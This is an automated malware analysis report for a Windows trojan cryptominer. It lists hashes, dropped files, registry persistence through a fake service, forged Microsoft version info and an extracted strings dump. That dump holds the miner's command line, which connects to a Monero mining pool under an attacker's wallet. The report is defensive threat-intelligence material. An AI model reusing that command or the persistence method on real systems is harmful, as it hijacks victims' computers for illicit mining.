Trojan.Win32.FlyStudio_feb553e293
Trojan.Win32.Miner.ays (Kaspersky), Trojan.Win32.FlyStudio.FD, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: feb553e293ec4fda92a8991683945aea
SHA1: 4af88b2ea5ab36b94e327a3c40d0b9cac99e4657
SHA256: 46dba6ebb695434d7994f5531134a29b70b7186f8b043dbfce7c8201a0e9f499
SSDeep: 98304:2esNqIUciP gBgFVsw9lYAA59SciZgcUv73FG2:IxUcvA59ziZgcULFG
Size: 3739648 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2016-03-23 13:06:07
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
srvany.exe:484
%original file name%.exe:852
The Trojan injects its code into the following process(es):
Systmsi.exe:168
Mutexes
The following mutexes were created/opened:
ShimCacheMutex
File activity
The process %original file name%.exe:852 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Systmsi.exe (7972 bytes)
%System%\srvany.exe (8 bytes)
Registry activity
The process srvany.exe:484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 79 95 64 02 79 97 09 33 ED 34 24 1A 8B B2 B7"
The process %original file name%.exe:852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 18 D9 E4 A1 01 18 AD 3D B6 71 0D 63 23 B9 7B"
[HKLM\System\CurrentControlSet\Services\Mmservess\Parameters]
"Application" = "c:\windows\svchoss.exe"
"AppDirectory" = "c:\windows\"
The process Systmsi.exe:168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 1A FA 39 60 11 8E 39 94 83 FC 6F A6 C9 56 A9"
Dropped PE files
| MD5 | File path |
|---|---|
| 3afeb8e9af02a33ff71bf2f6751cae3a | c:\WINDOWS\Systmsi.exe |
| 4635935fc972c582632bf45c26bfcb0e | c:\WINDOWS\system32\srvany.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.1.7600.16385
Legal Copyright: (c) Microsoft Corporation. All rights reserved.
Legal Trademarks:
Original Filename: WINHLP32.EXE
Internal Name: WINHSTB
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
File Description: Windows Winhlp32 Stub
Comments:
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 548250 | 548864 | 4.55263 | d9d5d1a6de71783dd97e9f63c4d2eda5 |
| .rdata | 552960 | 3088150 | 3088384 | 5.49628 | ef661e90226b3cd742cc5c54ffeacda4 |
| .data | 3641344 | 162376 | 73728 | 3.48987 | 43e9c7f7ae3791d02e17d4871afa86e6 |
| .rsrc | 3805184 | 24576 | 24576 | 3.00864 | a3bf26fe709435d26c129d82b7ea573e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
No activity has been detected.
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Web Traffic was not found.
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.rsrc
t$(SSh
u.htEx
~%UVW
u$SShe
kernel32.dll
user32.dll
advapi32.dll
Advapi32.dll
Kernel32.dll
ADVAPI32.DLL
EnumWindows
RegOpenKeyExA
RegCreateKeyExA
RegCloseKey
GetServiceKeyNameA
Systmsi.exe
Systmsi.exe -a cryptonight -o stratum tcp://xmr1.crypto-pool.fr:7777 -u 43YkRcrdW8zDsMNhP29S1yF8QBqYJ5UGgPCgCXUKyHnFFD8proXWxywYgMLvxBpVb4TSN3fD9taDrbJYnPbXAg6K5kNpLiN -p x -t 0 -dbg -1
Systmssi.exe
Systmssi.exe -a cryptonight -o stratum tcp://xmr1.crypto-pool.fr:7777 -u 43YkRcrdW8zDsMNhP29S1yF8QBqYJ5UGgPCgCXUKyHnFFD8proXWxywYgMLvxBpVb4TSN3fD9taDrbJYnPbXAg6K5kNpLiN -p x -t 0 -dbg -1
.pdata
@.tls
.vmp0
.vmp1
.reloc
@.rsrc
~{DsShYhKsSh
.ydn8
.XHUBL
F.MDo
/%c|]
Dh%dl{iV.Xk(b4i
[k.Wp
R7Œ
J".yk;?
9,%u4o
gYw.Sd
ÍqC
R<Ê
%x9$
d.Jn1QBE
uE.kjZ
v,%xP
x_.LB}
J%f|&
d-RNC}
@9%6s
OVV%d
b.Ra18
G`.db
$,J%d
Q%U08
m6%cy1~
: %d_
D%czn
d%UH{d-S};:
.rl=q
d~.Ty
C%dG#
Wudp
B,.Ad
,.lkG[
Uc%sV/
%d|u g:
rb;%d
N~U%doz
[2gM4|%d
-W}"6p
mA.RT
|X %u
/U\H%u
Z2.Oj
%x6t@
p8w%Ud`
)s%cK
^;%cv
.dpFD
Z.dAp
Z{%dQN%dT
e]VJ
*l2%dk
.Ruvd^
.crj}
SqlE
dK.iy
.NT"m
jfFL#%dV
%dM)*wa
w%DREP
T.ldE
%f_WB
.jG1i
~l%dM
S%dJ:
.eLDO
%d_}l
\O4K
m1%xv
%d*5_]
T~U`c.Oj}
.fN;
Y: %x
1#Hd.yn,
rudpn
.Wqdy
P%dtl
u-6Z}
%XYfa`
dS.NR
dw.hX~
K%dg#
5r8,.cU
/ .dDV
dw%Ua
1d ,.by
.dE-o
.fx}x
qWo.KoX
\(;k%d
)hg2/]Q{x%sMA.dcS
.DfdY
"7TMÖD^
.dh>S
KERNEL32.dll
ADVAPI32.dll
9g.dO
P.bz"|
Md["5).gD
F%D'@
,d *)('&M3210/.-<@;:</a.MT
%].IP
eNh<%dj
c@i%d
xkWebX
.kXI3
$D.bg
]BP%cnc*
sQLK
P.fNA@?k
`f%XtBt
.tTrc
J%sJ\l
8fO}eQtn%D|
%8XKF
0.cG$~
*9h 4B%S
.pD]5
*.*J\2
Ku? %C#
*f~%u
K%D@9oF1DL
.glJ(
1.czC
gsqL
l.Cx"<{{\.Iv0jNan$8.Ou3
BSql
6%x^b
#.Pqv
m:\[8
tH^!.AX
l(`.DoBc"
|e%x`
jO.PaoA
`.kfa
2t b.csv
-WpCrt'
.UgHv
sIr%sBrNs{rOstrxs]riKL.rv
cA tIx.cA
%8Sj[C
%UL"X@
YL.FtBDrK
ÚB oFAb"
p.uW&
w=\user32.dll
WS2_32.dll
)l.iWR
T%Fj>
USER32.dll
E:\CryptoNight\bitmonero-master\src\miner\x64\CPU-Release\Crypto.pdb
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
,Niw0.Sg
3.pQJ[8
.SjIp
2.sLi
%S!41
-i.OA
&b%xb#
.Lc\q3
o%C!Rs]
x.Lu~
L.qc7
.QG{Ml%.ONP
"%XE*QyU
<q.eH3
.iP-.
5]%6u
YOP,%F
.gb7-
$%6s#&
,%uK]
-2.OBv
%%u{^-i.MeR>PR
6.sf.
% .cwvGu
5.BL?r
3.uE"*8
_%9X<
.Ye1B
cSuS%S
Og#"%sS
nh.FB
s]rj%s
T -L}
7b.zW_
.vA2c
P?\ô
& .FP
o/.Uv
sSe`}%CR
D_.mRW
Kx`.rQ
I3.yO
`.lA#
1:q
O^.DM-
%D,3D
/9\:G%X
H%CQt`
2.NUr
us.QM
.WXp9
5TA%f
rt%XS
%F?;=
vwijmB%f
Kv(.rt
.kE1b
.Fv.1
`.nH0
[email protected]
.MLj2
.gue,
v.XR2
0h.fY
O-%UZq
.Lqd*
8%F.2
r.EJ@
3>L.bZ
y.Kqk
.MJ7R
G.MVo/
X@%5sG
!iQ.GL
S=%Uo
UE.eH1
s.RoG
:?B.At
7`|.mD*l
.GOA-
.qYc
crTV
%X83(
!.AU8
.XW$]
.yA b
OSQl
2b.cX
.%Uuo
9%D(:
.ETC.
8 8$8(8,8084888
4O4
88L8U8
? ?$?(?,?0?4?8?<?@?`?
4 4$4(4@4
6p7f7x7
< <$<(<,<0<4<
7v7D7p7}7
8$;(;,;0;4;8;<;@;
7u7F7Q7
1!1%1)1-1115191
1!292?2
4$4(4,404<4
4 4$4(4,4044484<4@4
< <$<(<,<0<4<8<
< <$<(<,<0<<<@<
; <@<\<`<